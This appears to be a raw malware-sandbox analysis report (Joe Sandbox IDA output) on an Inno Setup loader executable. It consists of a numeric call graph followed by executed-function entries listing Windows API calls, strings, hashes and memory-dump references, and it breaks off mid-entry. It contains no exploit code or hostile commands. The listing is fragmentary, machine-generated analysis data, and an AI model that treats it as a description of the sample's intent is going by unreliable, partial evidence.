5785->5787 5786->5787 5858 401c68 5786->5858 5787->5779 5793 4016f4 5789->5793 5791 4016fe 5814 4015c4 5791->5814 5793->5791 5796 40174f 5793->5796 5798 40175b 5793->5798 5806 401430 5793->5806 5818 40132c 5793->5818 5795 40170a 5795->5798 5822 40150c 5796->5822 5798->5784 5799 401dcc 5798->5799 5832 401d80 5799->5832 5802 40132c LocalAlloc 5803 401df0 5802->5803 5804 401df8 5803->5804 5836 401b44 5803->5836 5804->5784 5807 40143f VirtualAlloc 5806->5807 5809 40146c 5807->5809 5810 40148f 5807->5810 5826 4012e4 5809->5826 5810->5793 5813 40147c VirtualFree 5813->5810 5816 40160a 5814->5816 5815 40163a 5815->5795 5816->5815 5817 401626 VirtualAlloc 5816->5817 5817->5815 5817->5816 5819 401348 5818->5819 5820 4012e4 LocalAlloc 5819->5820 5821 40138f 5820->5821 5821->5793 5825 40153b 5822->5825 5823 401594 5823->5798 5824 401568 VirtualFree 5824->5825 5825->5823 5825->5824 5829 40128c 5826->5829 5830 401298 LocalAlloc 5829->5830 5831 4012aa 5829->5831 5830->5831 5831->5810 5831->5813 5833 401d92 5832->5833 5834 401d89 5832->5834 5833->5802 5834->5833 5841 401b74 5834->5841 5837 401b61 5836->5837 5838 401b52 5836->5838 5837->5804 5839 401d00 9 API calls 5838->5839 5840 401b5f 5839->5840 5840->5804 5844 40215c 5841->5844 5843 401b95 5843->5833 5845 40217a 5844->5845 5846 402175 5844->5846 5848 4021ab RtlEnterCriticalSection 5845->5848 5851 40217e 5845->5851 5854 4021b5 5845->5854 5847 401918 4 API calls 5846->5847 5847->5845 5848->5854 5849 4021c1 5852 4022e3 RtlLeaveCriticalSection 5849->5852 5853 4022ed 5849->5853 5850 402244 5850->5851 5855 401d80 7 API calls 5850->5855 5851->5843 5852->5853 5853->5843 5854->5849 5854->5850 5856 402270 5854->5856 5855->5851 5856->5849 5857 401d00 7 API calls 5856->5857 5857->5849 5859 401c7a 5858->5859 5860 401c9d 5859->5860 5861 401caf 5859->5861 5871 40188c 5860->5871 5863 40188c 3 API calls 5861->5863 5864 401cad 5863->5864 5865 401b44 9 API calls 5864->5865 5870 401cc5 5864->5870 5866 401cd4 5865->5866 5867 401cee 5866->5867 5881 401b98 5866->5881 5886 4013a0 5867->5886 5870->5787 5872 4018b2 5871->5872 5880 40190b 5871->5880 5890 401658 5872->5890 5875 40132c LocalAlloc 5876 4018cf 5875->5876 5877 4018e6 5876->5877 5878 40150c VirtualFree 5876->5878 5879 4013a0 LocalAlloc 5877->5879 5877->5880 5878->5877 5879->5880 5880->5864 5882 401b9d 5881->5882 5883 401bab 5881->5883 5884 401b74 9 API calls 5882->5884 5883->5867 5885 401baa 5884->5885 5885->5867 5887 4013ab 5886->5887 5888 4012e4 LocalAlloc 5887->5888 5889 4013c6 5887->5889 5888->5889 5889->5870 5892 40168f 5890->5892 5891 4016cf 5891->5875 5892->5891 5893 4016a9 VirtualFree 5892->5893 5893->5892 6850 402dfa 6851 402e26 6850->6851 6852 402e0d 6850->6852 6854 402ba4 6852->6854 6855 402bc9 6854->6855 6856 402bad 6854->6856 6855->6851 6857 402bb5 RaiseException 6856->6857 6857->6855 6858 4075fa GetFileSize 6859 407626 6858->6859 6860 407616 GetLastError 6858->6860 6860->6859 6861 40761f 6860->6861 6862 40748c 35 API calls 6861->6862 6862->6859 6863 406ffb 6864 407008 SetErrorMode 6863->6864 6532 403a80 CloseHandle 6533 403a90 6532->6533 6534 403a91 GetLastError 6532->6534 6535 404283 6536 4042c3 6535->6536 6537 403154 4 API calls 6536->6537 6538 404323 6537->6538 6865 404185 6866 4041ff 6865->6866 6867 403154 4 API calls 6866->6867 6868 4041cc 6866->6868 6869 404323 6867->6869 6539 403e87 6540 403e4c 6539->6540 6541 403e62 6540->6541 6542 403e7b 6540->6542 6543 403e67 6540->6543 6548 403cc8 6541->6548 6544 402674 4 API calls 6542->6544 6546 403e78 6543->6546 6552 402674 6543->6552 6544->6546 6549 403cd6 6548->6549 6550 402674 4 API calls 6549->6550 6551 403ceb 6549->6551 6550->6551 6551->6543 6553 403154 4 API calls 6552->6553 6554 40267a 6553->6554 6554->6546 6563 407e90 6564 407eb8 VirtualFree 6563->6564 6565 407e9d 6564->6565 6568 403e95 6569 403e4c 6568->6569 6570 403e62 6569->6570 6571 403e7b 6569->6571 6572 403e67 6569->6572 6574 403cc8 4 API calls 6570->6574 6573 402674 4 API calls 6571->6573 6575 403e78 6572->6575 6576 402674 4 API calls 6572->6576 6573->6575 6574->6572 6576->6575 6577 40ac97 6586 4096fc 6577->6586 6580 402f24 5 API calls 6581 40aca1 6580->6581 6582 403198 4 API calls 6581->6582 6583 40acc0 6582->6583 6584 403198 4 API calls 6583->6584 6585 40acc8 6584->6585 6595 4056ac 6586->6595 6588 409745 6592 403198 4 API calls 6588->6592 6589 409717 6589->6588 6601 40720c 6589->6601 6591 409735 6594 40973d MessageBoxA 6591->6594 6593 40975a 6592->6593 6593->6580 6593->6581 6594->6588 6596 403154 4 API calls 6595->6596 6597 4056b1 6596->6597 6598 4056c9 6597->6598 6599 403154 4 API calls 6597->6599 6598->6589 6600 4056bf 6599->6600 6600->6589 6602 4056ac 4 API calls 6601->6602 6603 40721b 6602->6603 6604 407221 6603->6604 6605 40722f 6603->6605 6606 40322c 4 API calls 6604->6606 6608 40724b 6605->6608 6609 40723f 6605->6609 6607 40722d 6606->6607 6607->6591 6619 4032b8 6608->6619 6612 4071d0 6609->6612 6613 40322c 4 API calls 6612->6613 6614 4071df 6613->6614 6615 4071fc 6614->6615 6616 406950 CharPrevA 6614->6616 6615->6607 6617 4071eb 6616->6617 6617->6615 6618 4032fc 18 API calls 6617->6618 6618->6615 6620 403278 18 API calls 6619->6620 6621 4032c2 6620->6621 6621->6607 6622 403a97 6623 403aac 6622->6623 6624 403bbc GetStdHandle 6623->6624 6625 403b0e CreateFileA 6623->6625 6626 403ab2 6623->6626 6627 403c17 GetLastError 6624->6627 6639 403bba 6624->6639 6625->6627 6628 403b2c 6625->6628 6627->6626 6630 403b3b GetFileSize 6628->6630 6628->6639 6630->6627 6632 403b4e SetFilePointer 6630->6632 6631 403be7 GetFileType 6631->6626 6634 403c02 CloseHandle 6631->6634 6632->6627 6635 403b6a ReadFile 6632->6635 6634->6626 6635->6627 6636 403b8c 6635->6636 6637 403b9f SetFilePointer 6636->6637 6636->6639 6637->6627 6638 403bb0 SetEndOfFile 6637->6638 6638->6627 6638->6639 6639->6626 6639->6631 6644 40aaa2 6645 40aad2 6644->6645 6646 40aadc CreateWindowExA SetWindowLongA 6645->6646 6647 405194 33 API calls 6646->6647 6648 40ab5f 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab6d 6649->6650 6651 4032fc 18 API calls 6650->6651 6652 40ab7a 6651->6652 6653 406b7c 19 API calls 6652->6653 6654 40ab86 6653->6654 6655 4032fc 18 API calls 6654->6655 6656 40ab8f 6655->6656 6657 4099ec 43 API calls 6656->6657 6658 40aba1 6657->6658 6659 4098cc 19 API calls 6658->6659 6660 40abb4 6658->6660 6659->6660 6661 40abed 6660->6661 6662 4094d8 9 API calls 6660->6662 6663 40ac06 6661->6663 6666 40ac00 RemoveDirectoryA 6661->6666 6662->6661 6664 40ac1a 6663->6664 6665 40ac0f DestroyWindow 6663->6665 6667 40ac42 6664->6667 6668 40357c 4 API calls 6664->6668 6665->6664 6666->6663 6669 40ac38 6668->6669 6670 4025ac 4 API calls 6669->6670 6670->6667 6882 405ba2 6884 405ba4 6882->6884 6883 405be0 6887 405940 19 API calls 6883->6887 6884->6883 6885 405bf7 6884->6885 6886 405bda 6884->6886 6890 404cdc 19 API calls 6885->6890 6886->6883 6888 405c4c 6886->6888 6895 405bf3 6887->6895 6889 4059b0 33 API calls 6888->6889 6889->6895 6892 405c20 6890->6892 6891 403198 4 API calls 6893 405c86 6891->6893 6894 4059b0 33 API calls 6892->6894 6894->6895 6895->6891 6896 408da4 6897 408dc8 6896->6897 6898 408c80 18 API calls 6897->6898 6899 408dd1 6898->6899 6671 402caa 6672 403154 4 API calls 6671->6672 6673 402caf 6672->6673 6914 4011aa 6915 4011ac GetStdHandle 6914->6915 6674 4028ac 6675 402594 18 API calls 6674->6675 6676 4028b6 6675->6676 4985 40aab4 4986 40aab8 SetLastError 4985->4986 5017 409648 GetLastError 4986->5017 4989 40aad2 4991 40aadc CreateWindowExA SetWindowLongA 4989->4991 5030 405194 4991->5030 4995 40ab6d 4996 4032fc 18 API calls 4995->4996 4997 40ab7a 4996->4997 5047 406b7c GetCommandLineA 4997->5047 5000 4032fc 18 API calls 5001 40ab8f 5000->5001 5052 4099ec 5001->5052 5003 40aba1 5005 40abb4 5003->5005 5073 4098cc 5003->5073 5006 40abd4 5005->5006 5007 40abed 5005->5007 5079 4094d8 5006->5079 5009 40ac06 5007->5009 5012 40ac00 RemoveDirectoryA 5007->5012 5010 40ac1a 5009->5010 5011 40ac0f DestroyWindow 5009->5011 5013 40ac42 5010->5013 5087 40357c 5010->5087 5011->5010 5012->5009 5015 40ac38 5100 4025ac 5015->5100 5105 404c94 5017->5105 5025 4096c3 5120 4031b8 5025->5120 5031 4051a8 33 API calls 5030->5031 5032 4051a3 5031->5032 5033 4032fc 5032->5033 5034 403300 5033->5034 5035 40333f 5033->5035 5036 4031e8 5034->5036 5037 40330a 5034->5037 5035->4995 5044 403254 18 API calls 5036->5044 5045 4031fc 5036->5045 5038 403334 5037->5038 5039 40331d 5037->5039 5041 4034f0 18 API calls 5038->5041 5281 4034f0 5039->5281 5043 403322 5041->5043 5042 403228 5042->4995 5043->4995 5044->5045 5045->5042 5046 4025ac 4 API calls 5045->5046 5046->5042 5307 406af0 5047->5307 5049 406ba1 5050 403198 4 API calls 5049->5050 5051 406bbf 5050->5051 5051->5000 5321 4033b4 5052->5321 5054 409a27 5055 409a59 CreateProcessA 5054->5055 5056 409a65 5055->5056 5057 409a6c CloseHandle 5055->5057 5058 409648 35 API calls 5056->5058 5059 409a75 5057->5059 5058->5057 5060 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5059->5060 5061 409a7a MsgWaitForMultipleObjects 5060->5061 5061->5059 5062 409a91 5061->5062 5063 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5062->5063 5064 409a96 GetExitCodeProcess CloseHandle 5063->5064 5065 409ab6 5064->5065 5066 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5065->5066 5067 409abe 5066->5067 5067->5003 5068 402f24 5069 403154 4 API calls 5068->5069 5070 402f29 5069->5070 5327 402bcc 5070->5327 5072 402f51 5072->5072 5074 40990e 5073->5074 5075 4098d4 5073->5075 5074->5005 5075->5074 5076 403420 18 API calls 5075->5076 5077 409908 5076->5077 5330 408e80 5077->5330 5080 409532 5079->5080 5084 4094eb 5079->5084 5080->5007 5081 4094f3 Sleep 5081->5084 5082 409503 Sleep 5082->5084 5084->5080 5084->5081 5084->5082 5085 40951a GetLastError 5084->5085 5353 408fbc 5084->5353 5085->5080 5086 409524 GetLastError 5085->5086 5086->5080 5086->5084 5088 403591 5087->5088 5089 4035a0 5087->5089 5092 4035d0 5088->5092 5093 40359b 5088->5093 5097 4035b6 5088->5097 5090 4035b1 5089->5090 5091 4035b8 5089->5091 5094 403198 4 API calls 5090->5094 5095 4031b8 4 API calls 5091->5095 5092->5097 5098 40357c 4 API calls 5092->5098 5093->5089 5096 4035ec 5093->5096 5094->5097 5095->5097 5096->5097 5370 403554 5096->5370 5097->5015 5098->5092 5101 4025ba 5100->5101 5103 4025b0 5100->5103 5101->5013 5102 402632 5102->5102 5103->5101 5103->5102 5104 403154 4 API calls 5103->5104 5104->5102 5128 4051a8 5105->5128 5108 407284 FormatMessageA 5109 4072aa 5108->5109 5110 403278 18 API calls 5109->5110 5111 4072c7 5110->5111 5112 408da8 5111->5112 5113 408dc8 5112->5113 5271 408c80 5113->5271 5116 405890 5117 405897 5116->5117 5118 4031e8 18 API calls 5117->5118 5119 4058af 5118->5119 5119->5025 5122 4031be 5120->5122 5121 4031e3 5124 403198 5121->5124 5122->5121 5123 4025ac 4 API calls 5122->5123 5123->5122 5125 4031b7 5124->5125 5126 40319e 5124->5126 5125->4989 5125->5068 5126->5125 5127 4025ac 4 API calls 5126->5127 5127->5125 5129 4051c5 5128->5129 5136 404e58 5129->5136 5132 4051f1 5141 403278 5132->5141 5138 404e73 5136->5138 5137 404e85 5137->5132 5146 404be4 5137->5146 5138->5137 5149 404f7a 5138->5149 5156 404e4c 5138->5156 5142 403254 18 API calls 5141->5142 5143 403288 5142->5143 5144 403198 4 API calls 5143->5144 5145 4032a0 5144->5145 5145->5108 5263 405940 5146->5263 5148 404bf5 5148->5132 5150 404f8b 5149->5150 5155 404fd9 5149->5155 5153 40505f 5150->5153 5150->5155 5152 404ff7 5152->5138 5153->5152 5163 404e38 5153->5163 5155->5152 5159 404df4 5155->5159 5157 403198 4 API calls 5156->5157 5158 404e56 5157->5158 5158->5138 5160 404e02 5159->5160 5166 404bfc 5160->5166 5162 404e30 5162->5155 5193 4039a4 5163->5193 5169 4059b0 5166->5169 5168 404c15 5168->5162 5170 4059be 5169->5170 5179 404cdc LoadStringA 5170->5179 5173 405194 33 API calls 5174 4059f6 5173->5174 5182 4031e8 5174->5182 5177 4031b8 4 API calls 5178 405a1b 5177->5178 5178->5168 5180 403278 18 API calls 5179->5180 5181 404d09 5180->5181 5181->5173 5183 4031ec 5182->5183 5186 4031fc 5182->5186 5183->5186 5188 403254 5183->5188 5184 403228 5184->5177 5186->5184 5187 4025ac 4 API calls 5186->5187 5187->5184 5189 403274 5188->5189 5190 403258 5188->5190 5189->5186 5191 402594 18 API calls 5190->5191 5192 403261 5191->5192 5192->5186 5194 4039ab 5193->5194 5199 4038b4 5194->5199 5196 4039cb 5197 403198 4 API calls 5196->5197 5198 4039d2 5197->5198 5198->5152 5200 4038d5 5199->5200 5201 4038c8 5199->5201 5203 403934 5200->5203 5204 4038db 5200->5204 5227 403780 5201->5227 5205 403993 5203->5205 5206 40393b 5203->5206 5207 4038e1 5204->5207 5208 4038ee 5204->5208 5211 4037f4 3 API calls 5205->5211 5212 403941 5206->5212 5213 40394b 5206->5213 5234 403894 5207->5234 5210 403894 6 API calls 5208->5210 5216 4038fc 5210->5216 5214 4038d0 5211->5214 5249 403864 5212->5249 5215 4037f4 3 API calls 5213->5215 5214->5196 5218 40395d 5215->5218 5239 4037f4 5216->5239 5220 403864 23 API calls 5218->5220 5222 403976 5220->5222 5221 403917 5245 40374c 5221->5245 5224 40374c VariantClear 5222->5224 5226 40398b 5224->5226 5225 40392c 5225->5196 5226->5196 5228 4037f0 5227->5228 5229 403744 5227->5229 5228->5214 5229->5227 5230 4037ab 5229->5230 5231 403793 VariantClear 5229->5231 5232 403198 4 API calls 5229->5232 5233 4037dc VariantCopyInd 5229->5233 5230->5214 5231->5229 5232->5229 5233->5228 5233->5229 5254 4036b8 5234->5254 5237 40374c VariantClear 5238 4038a9 5237->5238 5238->5214 5240 403845 VariantChangeTypeEx 5239->5240 5241 40380a VariantChangeTypeEx 5239->5241 5243 403832 5240->5243 5242 403826 5241->5242 5244 40374c VariantClear 5242->5244 5243->5221 5244->5243 5246 403766 5245->5246 5247 403759 5245->5247 5246->5225 5247->5246 5248 403779 VariantClear 5247->5248 5248->5225 5260 40369c SysStringLen 5249->5260 5252 40374c VariantClear 5253 403882 5252->5253 5253->5214 5255 4036cb 5254->5255 5256 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5255->5256 5257 4036db 5255->5257 5258 40372e 5256->5258 5259 4036ed MultiByteToWideChar SysAllocStringLen 5257->5259 5258->5237 5259->5258 5261 403610 21 API calls 5260->5261 5262 4036b3 5261->5262 5262->5252 5264 40594c 5263->5264 5265 404cdc 19 API calls 5264->5265 5266 405972 5265->5266 5267 4031e8 18 API calls 5266->5267 5268 40597d 5267->5268 5269 403198 4 API calls 5268->5269 5270 405992 5269->5270 5270->5148 5272 403198 4 API calls 5271->5272 5274 408cb1 5271->5274 5272->5274 5273 4031b8 4 API calls 5275 408d69 5273->5275 5276 408cc8 5274->5276 5277 403278 18 API calls 5274->5277 5279 4032fc 18 API calls 5274->5279 5280 408cdc 5274->5280 5275->5116 5278 4032fc 18 API calls 5276->5278 5277->5274 5278->5280 5279->5274 5280->5273 5282 4034fd 5281->5282 5289 40352d 5281->5289 5283 403526 5282->5283 5285 403509 5282->5285 5286 403254 18 API calls 5283->5286 5284 403198 4 API calls 5287 403517 5284->5287 5290 4025c4 5285->5290 5286->5289 5287->5043 5289->5284 5291 4025ca 5290->5291 5292 4025dc 5291->5292 5294 403154 5291->5294 5292->5287 5292->5292 5295 403164 5294->5295 5296 40318c TlsGetValue 5294->5296 5295->5292 5297 403196 5296->5297 5298 40316f 5296->5298 5297->5292 5302 40310c 5298->5302 5300 403174 TlsGetValue 5301 403184 5300->5301 5301->5292 5303 403120 LocalAlloc 5302->5303 5304 403116 5302->5304 5305 40313e TlsSetValue 5303->5305 5306 403132 5303->5306 5304->5303 5305->5306 5306->5300 5308 406b1c 5307->5308 5309 403278 18 API calls 5308->5309 5310 406b29 5309->5310 5317 403420 5310->5317 5312 406b31 5313 4031e8 18 API calls 5312->5313 5314 406b49 5313->5314 5315 403198 4 API calls 5314->5315 5316 406b6b 5315->5316 5316->5049 5318 403426 5317->5318 5320 403437 5317->5320 5319 403254 18 API calls 5318->5319 5318->5320 5319->5320 5320->5312 5322 4033bc 5321->5322 5323 403254 18 API calls 5322->5323 5324 4033cf 5323->5324 5325 4031e8 18 API calls 5324->5325 5326 4033f7 5325->5326 5328 402bd5 RaiseException 5327->5328 5329 402be6 5327->5329 5328->5329 5329->5072 5331 408e8e 5330->5331 5333 408ea6 5331->5333 5343 408e18 5331->5343 5334 408e18 18 API calls 5333->5334 5335 408eca 5333->5335 5334->5335 5346 407918 5335->5346 5337 408ee5 5338 408e18 18 API calls 5337->5338 5340 408ef8 5337->5340 5338->5340 5339 408e18 18 API calls 5339->5340 5340->5339 5341 403278 18 API calls 5340->5341 5342 408f27 5340->5342 5341->5340 5342->5074 5344 405890 18 API calls 5343->5344 5345 408e29 5344->5345 5345->5333 5349 4078c4 5346->5349 5350 4078d6 5349->5350 5351 4078e7 5349->5351 5352 4078db InterlockedExchange 5350->5352 5351->5337 5352->5351 5361 408f70 5353->5361 5355 408fd6 5355->5084 5356 408fd2 5356->5355 5357 408ff2 DeleteFileA GetLastError 5356->5357 5358 409010 5357->5358 5367 408fac 5358->5367 5362 408f7a 5361->5362 5363 408f7e 5361->5363 5362->5356 5364 408fa0 SetLastError 5363->5364 5365 408f87 Wow64DisableWow64FsRedirection 5363->5365 5366 408f9b 5364->5366 5365->5366 5366->5356 5368 408fb1 Wow64RevertWow64FsRedirection 5367->5368 5369 408fbb 5367->5369 5368->5369 5369->5084 5371 403566 5370->5371 5373 403578 5371->5373 5374 403604 5371->5374 5373->5096 5375 40357c 5374->5375 5378 4035d0 5375->5378 5379 40359b 5375->5379 5382 4035a0 5375->5382 5384 4035b6 5375->5384 5376 4035b1 5380 403198 4 API calls 5376->5380 5377 4035b8 5381 4031b8 4 API calls 5377->5381 5378->5384 5385 40357c 4 API calls 5378->5385 5379->5382 5383 4035ec 5379->5383 5380->5384 5381->5384 5382->5376 5382->5377 5383->5384 5386 403554 4 API calls 5383->5386 5384->5371 5385->5378 5386->5383 6677 401ab9 6678 401a96 6677->6678 6679 401aa9 RtlDeleteCriticalSection 6678->6679 6680 401a9f RtlLeaveCriticalSection 6678->6680 6680->6679

                                                                                                                            Executed Functions

                                                                                                                            Function 00409B78 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 130 409bc7-409bca 126->130 129 409bf2-409bf5 127->129 128->127 131 409be5-409bee call 409b70 129->131 132 409bf7-409bf9 129->132 130->124 130->127 131->129 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2441996862-0
                                                                                                                            • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                            • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                                            • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                                            • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040520C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                            • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                                            • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                                            • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                            • API String ID: 3256987805-3653653586
                                                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AAB4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02010470), ref: 0040966C
                                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                            • SetWindowLongA.USER32(0004043A,000000FC,00409960), ref: 0040AB15
                                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                            • DestroyWindow.USER32(0004043A,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                            • API String ID: 3757039580-3001827809
                                                                                                                            • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                            • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                                            • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                                            • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
